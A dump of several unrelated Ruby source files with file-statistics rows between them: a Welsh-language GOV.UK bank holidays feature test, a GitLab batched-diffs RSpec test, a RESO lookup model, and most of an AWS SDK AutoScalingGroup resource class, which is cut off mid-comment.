      assert page.has_selector?("link[rel=alternate][type='text/calendar'][href='/gwyliau-banc/yr-alban.ics']", visible: false)
      assert page.has_selector?("link[rel=alternate][type='application/json'][href='/gwyliau-banc/gogledd-iwerddon.json']", visible: false)
      assert page.has_selector?("link[rel=alternate][type='text/calendar'][href='/gwyliau-banc/gogledd-iwerddon.ics']", visible: false)
    end

    within "#content" do
      within ".gem-c-title" do
        assert page.has_content?("Gwyliau banc y DU")
      end

      within "article" do
        # One tab per UK nation, in display order.
        within ".govuk-tabs" do
          tab_labels = page.all("ul li a").map(&:text)
          assert_equal ["Cymru a Lloegr", "yr Alban", "Gogledd Iwerddon"], tab_labels
        end

        within ".govuk-tabs" do
          within "#cymru-a-lloegr" do
            assert page.has_link?("Ychwanegu'r gwyliau banc ar gyfer Cymru a Lloegr at eich calendr (ICS, 14KB)", href: "/gwyliau-banc/cymru-a-lloegr.ics")
            assert_bank_holiday_table title: "Gwyliau banc i ddod yng Nghymru a Lloegr", year: "2012", rows: [
              ["25 Rhagfyr", "Dydd Mawrth", "Dydd Nadolig"],
              ["26 Rhagfyr", "Dydd Mercher", "Dydd San Steffan"],
            ]
            assert_bank_holiday_table title: "Gwyliau banc i ddod yng Nghymru a Lloegr", year: "2013", rows: [
              ["1 Ionawr", "Dydd Mawrth", "Dydd Calan"],
              ["29 Mawrth", "Dydd Gwener", "Gwener y Groglith"],
              ["1 Ebrill", "Dydd Llun", "Llun y Pasg"],
              ["6 Mai", "Dydd Llun", "Gŵyl banc dechrau Mai"],
              ["27 Mai", "Dydd Llun", "Gŵyl banc y gwanwyn"],
              ["26 Awst", "Dydd Llun", "Gŵyl banc yr haf"],
              ["25 Rhagfyr", "Dydd Mercher", "Dydd Nadolig"],
              ["26 Rhagfyr", "Dydd Iau", "Dydd San Steffan"],
            ]
            assert_bank_holiday_table title: "Gwyliau banc blaenorol yng Nghymru a Lloegr", year: "2012", rows: [
              ["27 Awst", "Dydd Llun", "Gŵyl banc yr haf"],
              ["5 Mehefin", "Dydd Mawrth", "Jiwbilî Ddiemwnt y Frenhines (gŵyl banc ychwanegol)"],
              ["4 Mehefin", "Dydd Llun", "Gŵyl banc y gwanwyn (diwrnod amgen)"],
              ["7 Mai", "Dydd Llun", "Gŵyl banc dechrau Mai"],
              ["9 Ebrill", "Dydd Llun", "Llun y Pasg"],
              ["6 Ebrill", "Dydd Gwener", "Gwener y Groglith"],
              ["2 Ionawr", "Dydd Llun", "Dydd Calan (diwrnod amgen)"],
            ]
          end

          within "#yr-alban" do
            assert page.has_link?("Ychwanegu'r gwyliau banc ar gyfer yr Alban at eich calendr (ICS, 14KB)", href: "/gwyliau-banc/yr-alban.ics")
            assert_bank_holiday_table title: "Gwyliau banc i ddod yn yr Alban", year: "2012", rows: [
              ["25 Rhagfyr", "Dydd Mawrth", "Dydd Nadolig"],
              ["26 Rhagfyr", "Dydd Mercher", "Dydd San Steffan"],
            ]
            assert_bank_holiday_table title: "Gwyliau banc i ddod yn yr Alban", year: "2013", rows: [
              ["1 Ionawr", "Dydd Mawrth", "Dydd Calan"],
              ["2 Ionawr", "Dydd Mercher", "2il o Ionawr"],
              ["29 Mawrth", "Dydd Gwener", "Gwener y Groglith"],
              ["6 Mai", "Dydd Llun", "Gŵyl banc dechrau Mai"],
              ["27 Mai", "Dydd Llun", "Gŵyl banc y gwanwyn"],
              ["5 Awst", "Dydd Llun", "Gŵyl banc yr haf"],
              ["2 Rhagfyr", "Dydd Llun", "Gŵyl Andreas (diwrnod amgen)"],
              ["25 Rhagfyr", "Dydd Mercher", "Dydd Nadolig"],
              ["26 Rhagfyr", "Dydd Iau", "Dydd San Steffan"],
            ]
            assert_bank_holiday_table title: "Gwyliau banc blaenorol yn yr Alban", year: "2012", rows: [
              ["30 Tachwedd", "Dydd Gwener", "Gŵyl Andreas"],
              ["6 Awst", "Dydd Llun", "Gŵyl banc yr haf"],
              ["5 Mehefin", "Dydd Mawrth", "Jiwbilî Ddiemwnt y Frenhines (gŵyl banc ychwanegol)"],
              ["4 Mehefin", "Dydd Llun", "Gŵyl banc y gwanwyn (diwrnod amgen)"],
              ["7 Mai", "Dydd Llun", "Gŵyl banc dechrau Mai"],
              ["6 Ebrill", "Dydd Gwener", "Gwener y Groglith"],
              ["3 Ionawr", "Dydd Mawrth", "Dydd Calan (diwrnod amgen)"],
              ["2 Ionawr", "Dydd Llun", "2il o Ionawr"],
            ]
          end

          within "#gogledd-iwerddon" do
            assert page.has_link?("Ychwanegu'r gwyliau banc ar gyfer Gogledd Iwerddon at eich calendr (ICS, 14KB)", href: "/gwyliau-banc/gogledd-iwerddon.ics")
            assert_bank_holiday_table title: "Gwyliau banc i ddod yng Ngogledd Iwerddon", year: "2012", rows: [
              ["25 Rhagfyr", "Dydd Mawrth", "Dydd Nadolig"],
              ["26 Rhagfyr", "Dydd Mercher", "Dydd San Steffan"],
            ]
            assert_bank_holiday_table title: "Gwyliau banc i ddod yng Ngogledd Iwerddon", year: "2013", rows: [
              ["1 Ionawr", "Dydd Mawrth", "Dydd Calan"],
              ["18 Mawrth", "Dydd Llun", "Gŵyl Sant Padrig (diwrnod amgen)"],
              ["29 Mawrth", "Dydd Gwener", "Gwener y Groglith"],
              ["1 Ebrill", "Dydd Llun", "Llun y Pasg"],
              ["6 Mai", "Dydd Llun", "Gŵyl banc dechrau Mai"],
              ["27 Mai", "Dydd Llun", "Gŵyl banc y gwanwyn"],
              ["12 Gorffennaf", "Dydd Gwener", "Brwydr y Boyne (Dydd yr Orenwyr)"],
              ["26 Awst", "Dydd Llun", "Gŵyl banc yr haf"],
              ["25 Rhagfyr", "Dydd Mercher", "Dydd Nadolig"],
              ["26 Rhagfyr", "Dydd Iau", "Dydd San Steffan"],
            ]
            assert_bank_holiday_table title: "Gwyliau banc blaenorol yng Ngogledd Iwerddon", year: "2012", rows: [
              ["27 Awst", "Dydd Llun", "Gŵyl banc yr haf"],
              ["12 Gorffennaf", "Dydd Iau", "Brwydr y Boyne (Dydd yr Orenwyr)"],
              ["5 Mehefin", "Dydd Mawrth", "Jiwbilî Ddiemwnt y Frenhines (gŵyl banc ychwanegol)"],
              ["4 Mehefin", "Dydd Llun", "Gŵyl banc y gwanwyn"],
              ["7 Mai", "Dydd Llun", "Gŵyl banc dechrau Mai"],
              ["9 Ebrill", "Dydd Llun", "Llun y Pasg"],
              ["6 Ebrill", "Dydd Gwener", "Gwener y Groglith"],
              ["19 Mawrth", "Dydd Llun", "Gŵyl Sant Padrig (diwrnod amgen)"],
              ["2 Ionawr", "Dydd Llun", "Dydd Calan (diwrnod amgen)"],
            ]
          end
        end
      end
    end
  end

  should "display the correct upcoming event" do
    # 3rd Jan 2012 is itself a Scottish bank holiday, exercising "heddiw"
    # (today) in the Scotland panel.
    Timecop.travel(Date.parse("2012-01-03")) do
      visit "/gwyliau-banc"
      within ".govuk-tabs" do
        within "#cymru-a-lloegr .govuk-panel" do
          assert page.has_content?("Yr ŵyl banc nesaf yng Nghymru a Lloegr yw")
          assert page.has_content?("6 Ebrill")
          assert page.has_content?("Gwener y Groglith")
        end
        within "#yr-alban .govuk-panel" do
          assert page.has_content?("Yr ŵyl banc nesaf yn yr Alban yw")
          assert page.has_content?("heddiw")
          assert page.has_content?("Dydd Calan")
        end
        within "#gogledd-iwerddon .govuk-panel" do
          assert page.has_content?("Yr ŵyl banc nesaf yng Ngogledd Iwerddon yw")
          assert page.has_content?("19 Mawrth")
          assert page.has_content?("Gŵyl Sant Padrig")
        end
      end
    end
  end

  context "showing bunting on bank holidays" do
    should "show bunting when today is a buntable bank holiday" do
      Timecop.travel(Date.parse("2nd Jan 2012")) do
        visit "/gwyliau-banc"
        assert page.has_css?(".app-o-epic-bunting")
      end
    end

    should "not show bunting if today is a non-buntable bank holiday" do
      Timecop.travel(Date.parse("12th July 2013")) do
        visit "/gwyliau-banc"
        assert page.has_no_css?(".app-o-epic-bunting")
      end
    end

    should "not show bunting when today is not a bank holiday" do
      Timecop.travel(Date.parse("3rd Feb 2012")) do
        visit "/gwyliau-banc"
        assert page.has_no_css?(".app-o-epic-bunting")
      end
    end
  end

  context "last updated" do
    should "be translated and localised" do
      Timecop.travel(Date.parse("25th Dec 2012")) do
        visit "/gwyliau-banc"
        within ".app-c-meta-data" do
          assert page.has_content?("Diweddarwyd ddiwethaf: 25 Rhagfyr 2012")
        end
      end
    end
  end
end
| 46.140845 | 173 | 0.582316 |
ffb9694e806596a05fc15ed9c306f6a8e392e6f3 | 3,955 | # frozen_string_literal: true
require 'spec_helper'
RSpec.describe 'Batch diffs', :js do
include MergeRequestDiffHelpers
include RepoHelpers
let(:project) { create(:project, :repository) }
let(:merge_request) { create(:merge_request, source_project: project, source_branch: 'master', target_branch: 'empty-branch') }
before do
sign_in(project.first_owner)
visit diffs_project_merge_request_path(merge_request.project, merge_request)
wait_for_requests
# Add discussion to first line of first file
click_diff_line(find('.diff-file.file-holder:first-of-type .line_holder .left-side:first-of-type'))
page.within('.js-discussion-note-form') do
fill_in('note_note', with: 'First Line Comment')
click_button('Add comment now')
end
# Add discussion to first line of last file
click_diff_line(find('.diff-file.file-holder:last-of-type .line_holder .left-side:first-of-type'))
page.within('.js-discussion-note-form') do
fill_in('note_note', with: 'Last Line Comment')
click_button('Add comment now')
end
wait_for_requests
end
it 'assigns discussions to diff files across multiple batch pages' do
# Reload so we know the discussions are persisting across batch loads
visit page.current_url
# Wait for JS to settle
wait_for_requests
expect(page).to have_selector('.diff-files-holder .file-holder', count: 39)
# Confirm discussions are applied to appropriate files (should be contained in multiple diff pages)
page.within('.diff-file.file-holder:first-of-type .notes .timeline-entry .note .note-text') do
expect(page).to have_content('First Line Comment')
end
page.within('.diff-file.file-holder:last-of-type .notes .timeline-entry .note .note-text') do
expect(page).to have_content('Last Line Comment')
end
end
context 'when user visits a URL with a link directly to to a discussion' do
context 'which is in the first batched page of diffs' do
it 'scrolls to the correct discussion' do
page.within('.diff-file.file-holder:first-of-type') do
click_link('just now')
end
visit page.current_url
wait_for_requests
# Confirm scrolled to correct UI element
expect(page.find('.diff-file.file-holder:first-of-type .discussion-notes .timeline-entry li.note[id]').obscured?).to be_falsey
expect(page.find('.diff-file.file-holder:last-of-type .discussion-notes .timeline-entry li.note[id]').obscured?).to be_truthy
end
end
context 'which is in at least page 2 of the batched pages of diffs' do
it 'scrolls to the correct discussion',
quarantine: { issue: 'https://gitlab.com/gitlab-org/gitlab/-/issues/293814' } do
page.within('.diff-file.file-holder:last-of-type') do
click_link('just now')
end
visit page.current_url
wait_for_requests
# Confirm scrolled to correct UI element
expect(page.find('.diff-file.file-holder:first-of-type .discussion-notes .timeline-entry li.note[id]').obscured?).to be_truthy
expect(page.find('.diff-file.file-holder:last-of-type .discussion-notes .timeline-entry li.note[id]').obscured?).to be_falsey
end
end
end
context 'when user switches view styles' do
before do
find('.js-show-diff-settings').click
click_button 'Side-by-side'
wait_for_requests
end
it 'has the correct discussions applied to files across batched pages' do
expect(page).to have_selector('.diff-files-holder .file-holder', count: 39)
page.within('.diff-file.file-holder:first-of-type .notes .timeline-entry .note .note-text') do
expect(page).to have_content('First Line Comment')
end
page.within('.diff-file.file-holder:last-of-type .notes .timeline-entry .note .note-text') do
expect(page).to have_content('Last Line Comment')
end
end
end
end
| 35.954545 | 134 | 0.695322 |
ab34e1d451d9d2344b898956dd25a1b4d05c2faf | 269 | class RESO::Lookup::PoolFeature < RESO::Enumeration
has_many :pool_feature_assignments, foreign_key: :enumeration_id
has_many :reso_property_characteristics, through: :pool_feature_assignments, source: :enumerable, source_type: "RESO::Property::Characteristic"
end
| 53.8 | 145 | 0.825279 |
1c469ce850dbf77b56cd11e6c1ccdff572cbf660 | 49,215 | # frozen_string_literal: true
# WARNING ABOUT GENERATED CODE
#
# This file is generated. See the contributing guide for more information:
# https://github.com/aws/aws-sdk-ruby/blob/master/CONTRIBUTING.md
#
# WARNING ABOUT GENERATED CODE
module Aws::AutoScaling
class AutoScalingGroup
extend Aws::Deprecations
# @overload def initialize(name, options = {})
# @param [String] name
# @option options [Client] :client
# @overload def initialize(options = {})
# @option options [required, String] :name
# @option options [Client] :client
def initialize(*args)
options = Hash === args.last ? args.pop.dup : {}
@name = extract_name(args, options)
@data = options.delete(:data)
@client = options.delete(:client) || Client.new(options)
@waiter_block_warned = false
end
# @!group Read-Only Attributes
# @return [String]
def name
@name
end
alias :auto_scaling_group_name :name
# The Amazon Resource Name (ARN) of the Auto Scaling group.
# @return [String]
def auto_scaling_group_arn
data[:auto_scaling_group_arn]
end
# The name of the associated launch configuration.
# @return [String]
def launch_configuration_name
data[:launch_configuration_name]
end
# The launch template for the group.
# @return [Types::LaunchTemplateSpecification]
def launch_template
data[:launch_template]
end
# The mixed instances policy for the group.
# @return [Types::MixedInstancesPolicy]
def mixed_instances_policy
data[:mixed_instances_policy]
end
# The minimum size of the group.
# @return [Integer]
def min_size
data[:min_size]
end
# The maximum size of the group.
# @return [Integer]
def max_size
data[:max_size]
end
# The desired size of the group.
# @return [Integer]
def desired_capacity
data[:desired_capacity]
end
# The duration of the default cooldown period, in seconds.
# @return [Integer]
def default_cooldown
data[:default_cooldown]
end
# One or more Availability Zones for the group.
# @return [Array<String>]
def availability_zones
data[:availability_zones]
end
# One or more load balancers associated with the group.
# @return [Array<String>]
def load_balancer_names
data[:load_balancer_names]
end
# The Amazon Resource Names (ARN) of the target groups for your load
# balancer.
# @return [Array<String>]
def target_group_arns
data[:target_group_arns]
end
# The service to use for the health checks. The valid values are `EC2`
# and `ELB`. If you configure an Auto Scaling group to use ELB health
# checks, it considers the instance unhealthy if it fails either the EC2
# status checks or the load balancer health checks.
# @return [String]
def health_check_type
data[:health_check_type]
end
# The amount of time, in seconds, that Amazon EC2 Auto Scaling waits
# before checking the health status of an EC2 instance that has come
# into service.
# @return [Integer]
def health_check_grace_period
data[:health_check_grace_period]
end
# The date and time the group was created.
# @return [Time]
def created_time
data[:created_time]
end
# The suspended processes associated with the group.
# @return [Array<Types::SuspendedProcess>]
def suspended_processes
data[:suspended_processes]
end
# The name of the placement group into which to launch your instances,
# if any.
# @return [String]
def placement_group
data[:placement_group]
end
# One or more subnet IDs, if applicable, separated by commas.
# @return [String]
def vpc_zone_identifier
data[:vpc_zone_identifier]
end
# The metrics enabled for the group.
# @return [Array<Types::EnabledMetric>]
def enabled_metrics
data[:enabled_metrics]
end
# The current state of the group when the DeleteAutoScalingGroup
# operation is in progress.
# @return [String]
def status
data[:status]
end
# The termination policies for the group.
# @return [Array<String>]
def termination_policies
data[:termination_policies]
end
# Indicates whether newly launched instances are protected from
# termination by Amazon EC2 Auto Scaling when scaling in.
# @return [Boolean]
def new_instances_protected_from_scale_in
data[:new_instances_protected_from_scale_in]
end
# The Amazon Resource Name (ARN) of the service-linked role that the
# Auto Scaling group uses to call other AWS services on your behalf.
# @return [String]
def service_linked_role_arn
data[:service_linked_role_arn]
end
# The maximum amount of time, in seconds, that an instance can be in
# service.
#
# Valid Range: Minimum value of 0.
# @return [Integer]
def max_instance_lifetime
data[:max_instance_lifetime]
end
# Indicates whether Capacity Rebalancing is enabled.
# @return [Boolean]
def capacity_rebalance
data[:capacity_rebalance]
end
# @!endgroup
# @return [Client]
def client
@client
end
# Loads, or reloads {#data} for the current {AutoScalingGroup}.
# Returns `self` making it possible to chain methods.
#
# auto_scaling_group.reload.data
#
# @return [self]
def load
resp = @client.describe_auto_scaling_groups(auto_scaling_group_names: [@name])
@data = resp.auto_scaling_groups[0]
self
end
alias :reload :load
# @return [Types::AutoScalingGroup]
# Returns the data for this {AutoScalingGroup}. Calls
# {Client#describe_auto_scaling_groups} if {#data_loaded?} is `false`.
def data
load unless @data
@data
end
# @return [Boolean]
# Returns `true` if this resource is loaded. Accessing attributes or
# {#data} on an unloaded resource will trigger a call to {#load}.
def data_loaded?
!!@data
end
# @param [Hash] options ({})
# @return [Boolean]
# Returns `true` if the AutoScalingGroup exists.
def exists?(options = {})
begin
wait_until_exists(options.merge(max_attempts: 1))
true
rescue Aws::Waiters::Errors::UnexpectedError => e
raise e.error
rescue Aws::Waiters::Errors::WaiterFailed
false
end
end
# @param [Hash] options ({})
# @option options [Integer] :max_attempts (10)
# @option options [Float] :delay (5)
# @option options [Proc] :before_attempt
# @option options [Proc] :before_wait
# @return [AutoScalingGroup]
def wait_until_exists(options = {}, &block)
options, params = separate_params_and_options(options)
waiter = Waiters::GroupExists.new(options)
yield_waiter_and_warn(waiter, &block) if block_given?
waiter.wait(params.merge(auto_scaling_group_names: [@name]))
AutoScalingGroup.new({
name: @name,
client: @client
})
end
# @param [Hash] options ({})
# @option options [Integer] :max_attempts (40)
# @option options [Float] :delay (15)
# @option options [Proc] :before_attempt
# @option options [Proc] :before_wait
# @return [AutoScalingGroup]
def wait_until_in_service(options = {}, &block)
options, params = separate_params_and_options(options)
waiter = Waiters::GroupInService.new(options)
yield_waiter_and_warn(waiter, &block) if block_given?
waiter.wait(params.merge(auto_scaling_group_names: [@name]))
AutoScalingGroup.new({
name: @name,
client: @client
})
end
# @param [Hash] options ({})
# @option options [Integer] :max_attempts (40)
# @option options [Float] :delay (15)
# @option options [Proc] :before_attempt
# @option options [Proc] :before_wait
# @return [AutoScalingGroup]
def wait_until_not_exists(options = {}, &block)
options, params = separate_params_and_options(options)
waiter = Waiters::GroupNotExists.new(options)
yield_waiter_and_warn(waiter, &block) if block_given?
waiter.wait(params.merge(auto_scaling_group_names: [@name]))
AutoScalingGroup.new({
name: @name,
client: @client
})
end
# @deprecated Use [Aws::AutoScaling::Client] #wait_until instead
#
# Waiter polls an API operation until a resource enters a desired
# state.
#
# @note The waiting operation is performed on a copy. The original resource
# remains unchanged.
#
# ## Basic Usage
#
# Waiter will polls until it is successful, it fails by
# entering a terminal state, or until a maximum number of attempts
# are made.
#
# # polls in a loop until condition is true
# resource.wait_until(options) {|resource| condition}
#
# ## Example
#
# instance.wait_until(max_attempts:10, delay:5) do |instance|
# instance.state.name == 'running'
# end
#
# ## Configuration
#
# You can configure the maximum number of polling attempts, and the
# delay (in seconds) between each polling attempt. The waiting condition is
# set by passing a block to {#wait_until}:
#
# # poll for ~25 seconds
# resource.wait_until(max_attempts:5,delay:5) {|resource|...}
#
# ## Callbacks
#
# You can be notified before each polling attempt and before each
# delay. If you throw `:success` or `:failure` from these callbacks,
# it will terminate the waiter.
#
# started_at = Time.now
# # poll for 1 hour, instead of a number of attempts
# proc = Proc.new do |attempts, response|
# throw :failure if Time.now - started_at > 3600
# end
#
# # disable max attempts
# instance.wait_until(before_wait:proc, max_attempts:nil) {...}
#
# ## Handling Errors
#
# When a waiter is successful, it returns the Resource. When a waiter
# fails, it raises an error.
#
# begin
# resource.wait_until(...)
# rescue Aws::Waiters::Errors::WaiterFailed
# # resource did not enter the desired state in time
# end
#
# @yieldparam [Resource] resource to be used in the waiting condition.
#
# @raise [Aws::Waiters::Errors::FailureStateError] Raised when the waiter
# terminates because the waiter has entered a state that it will not
# transition out of, preventing success.
#
# yet successful.
#
# @raise [Aws::Waiters::Errors::UnexpectedError] Raised when an error is
# encountered while polling for a resource that is not expected.
#
# @raise [NotImplementedError] Raised when the resource does not
#
# @option options [Integer] :max_attempts (10) Maximum number of
# attempts
# @option options [Integer] :delay (10) Delay between each
# attempt in seconds
# @option options [Proc] :before_attempt (nil) Callback
# invoked before each attempt
# @option options [Proc] :before_wait (nil) Callback
# invoked before each wait
# @return [Resource] if the waiter was successful
def wait_until(options = {}, &block)
self_copy = self.dup
attempts = 0
options[:max_attempts] = 10 unless options.key?(:max_attempts)
options[:delay] ||= 10
options[:poller] = Proc.new do
attempts += 1
if block.call(self_copy)
[:success, self_copy]
else
self_copy.reload unless attempts == options[:max_attempts]
:retry
end
end
Aws::Waiters::Waiter.new(options).wait({})
end
# @!group Actions
# @example Request syntax with placeholder values
#
# auto_scaling_group.attach_instances({
# instance_ids: ["XmlStringMaxLen19"],
# })
# @param [Hash] options ({})
# @option options [Array<String>] :instance_ids
# The IDs of the instances. You can specify up to 20 instances.
# @return [EmptyStructure]
def attach_instances(options = {})
options = options.merge(auto_scaling_group_name: @name)
resp = @client.attach_instances(options)
resp.data
end
# @example Request syntax with placeholder values
#
# auto_scaling_group.delete({
# force_delete: false,
# })
# @param [Hash] options ({})
# @option options [Boolean] :force_delete
# Specifies that the group is to be deleted along with all instances
# associated with the group, without waiting for all instances to be
# terminated. This parameter also deletes any lifecycle actions
# associated with the group.
# @return [EmptyStructure]
def delete(options = {})
options = options.merge(auto_scaling_group_name: @name)
resp = @client.delete_auto_scaling_group(options)
resp.data
end
# @example Request syntax with placeholder values
#
# activity = auto_scaling_group.detach_instances({
# instance_ids: ["XmlStringMaxLen19"],
# should_decrement_desired_capacity: false, # required
# })
# @param [Hash] options ({})
# @option options [Array<String>] :instance_ids
# The IDs of the instances. You can specify up to 20 instances.
# @option options [required, Boolean] :should_decrement_desired_capacity
# Indicates whether the Auto Scaling group decrements the desired
# capacity value by the number of instances detached.
# @return [Activity::Collection]
def detach_instances(options = {})
batch = []
options = options.merge(auto_scaling_group_name: @name)
resp = @client.detach_instances(options)
resp.data.activities.each do |a|
batch << Activity.new(
id: a.activity_id,
data: a,
client: @client
)
end
Activity::Collection.new([batch], size: batch.size)
end
# @example Request syntax with placeholder values
#
# auto_scaling_group.disable_metrics_collection({
# metrics: ["XmlStringMaxLen255"],
# })
# @param [Hash] options ({})
# @option options [Array<String>] :metrics
# Specifies one or more of the following metrics:
#
# * `GroupMinSize`
#
# * `GroupMaxSize`
#
# * `GroupDesiredCapacity`
#
# * `GroupInServiceInstances`
#
# * `GroupPendingInstances`
#
# * `GroupStandbyInstances`
#
# * `GroupTerminatingInstances`
#
# * `GroupTotalInstances`
#
# * `GroupInServiceCapacity`
#
# * `GroupPendingCapacity`
#
# * `GroupStandbyCapacity`
#
# * `GroupTerminatingCapacity`
#
# * `GroupTotalCapacity`
#
# If you omit this parameter, all metrics are disabled.
# @return [EmptyStructure]
def disable_metrics_collection(options = {})
options = options.merge(auto_scaling_group_name: @name)
resp = @client.disable_metrics_collection(options)
resp.data
end
# @example Request syntax with placeholder values
#
# auto_scaling_group.enable_metrics_collection({
# metrics: ["XmlStringMaxLen255"],
# granularity: "XmlStringMaxLen255", # required
# })
# @param [Hash] options ({})
# @option options [Array<String>] :metrics
# Specifies which group-level metrics to start collecting. You can
# specify one or more of the following metrics:
#
# * `GroupMinSize`
#
# * `GroupMaxSize`
#
# * `GroupDesiredCapacity`
#
# * `GroupInServiceInstances`
#
# * `GroupPendingInstances`
#
# * `GroupStandbyInstances`
#
# * `GroupTerminatingInstances`
#
# * `GroupTotalInstances`
#
# The instance weighting feature supports the following additional
# metrics:
#
# * `GroupInServiceCapacity`
#
# * `GroupPendingCapacity`
#
# * `GroupStandbyCapacity`
#
# * `GroupTerminatingCapacity`
#
# * `GroupTotalCapacity`
#
# If you omit this parameter, all metrics are enabled.
# @option options [required, String] :granularity
# The granularity to associate with the metrics to collect. The only
# valid value is `1Minute`.
# @return [EmptyStructure]
def enable_metrics_collection(options = {})
options = options.merge(auto_scaling_group_name: @name)
resp = @client.enable_metrics_collection(options)
resp.data
end
# @example Request syntax with placeholder values
#
# scalingpolicy = auto_scaling_group.put_scaling_policy({
# policy_name: "XmlStringMaxLen255", # required
# policy_type: "XmlStringMaxLen64",
# adjustment_type: "XmlStringMaxLen255",
# min_adjustment_step: 1,
# min_adjustment_magnitude: 1,
# scaling_adjustment: 1,
# cooldown: 1,
# metric_aggregation_type: "XmlStringMaxLen32",
# step_adjustments: [
# {
# metric_interval_lower_bound: 1.0,
# metric_interval_upper_bound: 1.0,
# scaling_adjustment: 1, # required
# },
# ],
# estimated_instance_warmup: 1,
# target_tracking_configuration: {
# predefined_metric_specification: {
# predefined_metric_type: "ASGAverageCPUUtilization", # required, accepts ASGAverageCPUUtilization, ASGAverageNetworkIn, ASGAverageNetworkOut, ALBRequestCountPerTarget
# resource_label: "XmlStringMaxLen1023",
# },
# customized_metric_specification: {
# metric_name: "MetricName", # required
# namespace: "MetricNamespace", # required
# dimensions: [
# {
# name: "MetricDimensionName", # required
# value: "MetricDimensionValue", # required
# },
# ],
# statistic: "Average", # required, accepts Average, Minimum, Maximum, SampleCount, Sum
# unit: "MetricUnit",
# },
# target_value: 1.0, # required
# disable_scale_in: false,
# },
# enabled: false,
# })
# @param [Hash] options ({})
# @option options [required, String] :policy_name
# The name of the policy.
# @option options [String] :policy_type
# One of the following policy types:
#
# * `TargetTrackingScaling`
#
# * `StepScaling`
#
# * `SimpleScaling` (default)
# @option options [String] :adjustment_type
# Specifies how the scaling adjustment is interpreted (for example, an
# absolute number or a percentage). The valid values are
# `ChangeInCapacity`, `ExactCapacity`, and `PercentChangeInCapacity`.
#
# Required if the policy type is `StepScaling` or `SimpleScaling`. For
# more information, see [Scaling adjustment types][1] in the *Amazon EC2
# Auto Scaling User Guide*.
#
#
#
# [1]: https://docs.aws.amazon.com/autoscaling/ec2/userguide/as-scaling-simple-step.html#as-scaling-adjustment
# @option options [Integer] :min_adjustment_step
# Available for backward compatibility. Use `MinAdjustmentMagnitude`
# instead.
# @option options [Integer] :min_adjustment_magnitude
# The minimum value to scale by when the adjustment type is
# `PercentChangeInCapacity`. For example, suppose that you create a step
# scaling policy to scale out an Auto Scaling group by 25 percent and
# you specify a `MinAdjustmentMagnitude` of 2. If the group has 4
# instances and the scaling policy is performed, 25 percent of 4 is 1.
# However, because you specified a `MinAdjustmentMagnitude` of 2, Amazon
# EC2 Auto Scaling scales out the group by 2 instances.
#
# Valid only if the policy type is `StepScaling` or `SimpleScaling`. For
# more information, see [Scaling adjustment types][1] in the *Amazon EC2
# Auto Scaling User Guide*.
#
# <note markdown="1"> Some Auto Scaling groups use instance weights. In this case, set the
# `MinAdjustmentMagnitude` to a value that is at least as large as your
# largest instance weight.
#
# </note>
#
#
#
# [1]: https://docs.aws.amazon.com/autoscaling/ec2/userguide/as-scaling-simple-step.html#as-scaling-adjustment
# @option options [Integer] :scaling_adjustment
# The amount by which to scale, based on the specified adjustment type.
# A positive value adds to the current capacity while a negative number
# removes from the current capacity. For exact capacity, you must
# specify a positive value.
#
# Required if the policy type is `SimpleScaling`. (Not used with any
# other policy type.)
# @option options [Integer] :cooldown
# The duration of the policy's cooldown period, in seconds. When a
# cooldown period is specified here, it overrides the default cooldown
# period defined for the Auto Scaling group.
#
# Valid only if the policy type is `SimpleScaling`. For more
# information, see [Scaling cooldowns for Amazon EC2 Auto Scaling][1] in
# the *Amazon EC2 Auto Scaling User Guide*.
#
#
#
# [1]: https://docs.aws.amazon.com/autoscaling/ec2/userguide/Cooldown.html
# @option options [String] :metric_aggregation_type
# The aggregation type for the CloudWatch metrics. The valid values are
# `Minimum`, `Maximum`, and `Average`. If the aggregation type is null,
# the value is treated as `Average`.
#
# Valid only if the policy type is `StepScaling`.
# @option options [Array<Types::StepAdjustment>] :step_adjustments
# A set of adjustments that enable you to scale based on the size of the
# alarm breach.
#
# Required if the policy type is `StepScaling`. (Not used with any other
# policy type.)
# @option options [Integer] :estimated_instance_warmup
# The estimated time, in seconds, until a newly launched instance can
# contribute to the CloudWatch metrics. If not provided, the default is
# to use the value from the default cooldown period for the Auto Scaling
# group.
#
# Valid only if the policy type is `TargetTrackingScaling` or
# `StepScaling`.
# @option options [Types::TargetTrackingConfiguration] :target_tracking_configuration
# A target tracking scaling policy. Includes support for predefined or
# customized metrics.
#
# The following predefined metrics are available:
#
# * `ASGAverageCPUUtilization`
#
# * `ASGAverageNetworkIn`
#
# * `ASGAverageNetworkOut`
#
# * `ALBRequestCountPerTarget`
#
# If you specify `ALBRequestCountPerTarget` for the metric, you must
# specify the `ResourceLabel` parameter with the
# `PredefinedMetricSpecification`.
#
# For more information, see [TargetTrackingConfiguration][1] in the
# *Amazon EC2 Auto Scaling API Reference*.
#
# Required if the policy type is `TargetTrackingScaling`.
#
#
#
# [1]: https://docs.aws.amazon.com/autoscaling/ec2/APIReference/API_TargetTrackingConfiguration.html
# @option options [Boolean] :enabled
# Indicates whether the scaling policy is enabled or disabled. The
# default is enabled. For more information, see [Disabling a scaling
# policy for an Auto Scaling group][1] in the *Amazon EC2 Auto Scaling
# User Guide*.
#
#
#
# [1]: https://docs.aws.amazon.com/autoscaling/ec2/userguide/as-enable-disable-scaling-policy.html
# @return [ScalingPolicy]
def put_scaling_policy(options = {})
  # Scope the request to this group, issue it, then wrap the resulting
  # policy (identified by the caller-supplied :policy_name) in a resource.
  request_params = options.merge(auto_scaling_group_name: @name)
  @client.put_scaling_policy(request_params)
  ScalingPolicy.new(name: request_params[:policy_name], client: @client)
end
# @example Request syntax with placeholder values
#
# scheduledaction = auto_scaling_group.put_scheduled_update_group_action({
# scheduled_action_name: "XmlStringMaxLen255", # required
# time: Time.now,
# start_time: Time.now,
# end_time: Time.now,
# recurrence: "XmlStringMaxLen255",
# min_size: 1,
# max_size: 1,
# desired_capacity: 1,
# })
# @param [Hash] options ({})
# @option options [required, String] :scheduled_action_name
# The name of this scaling action.
# @option options [Time,DateTime,Date,Integer,String] :time
# This parameter is no longer used.
# @option options [Time,DateTime,Date,Integer,String] :start_time
# The date and time for this action to start, in YYYY-MM-DDThh:mm:ssZ
# format in UTC/GMT only and in quotes (for example,
# `"2019-06-01T00:00:00Z"`).
#
# If you specify `Recurrence` and `StartTime`, Amazon EC2 Auto Scaling
# performs the action at this time, and then performs the action based
# on the specified recurrence.
#
# If you try to schedule your action in the past, Amazon EC2 Auto
# Scaling returns an error message.
# @option options [Time,DateTime,Date,Integer,String] :end_time
# The date and time for the recurring schedule to end. Amazon EC2 Auto
# Scaling does not perform the action after this time.
# @option options [String] :recurrence
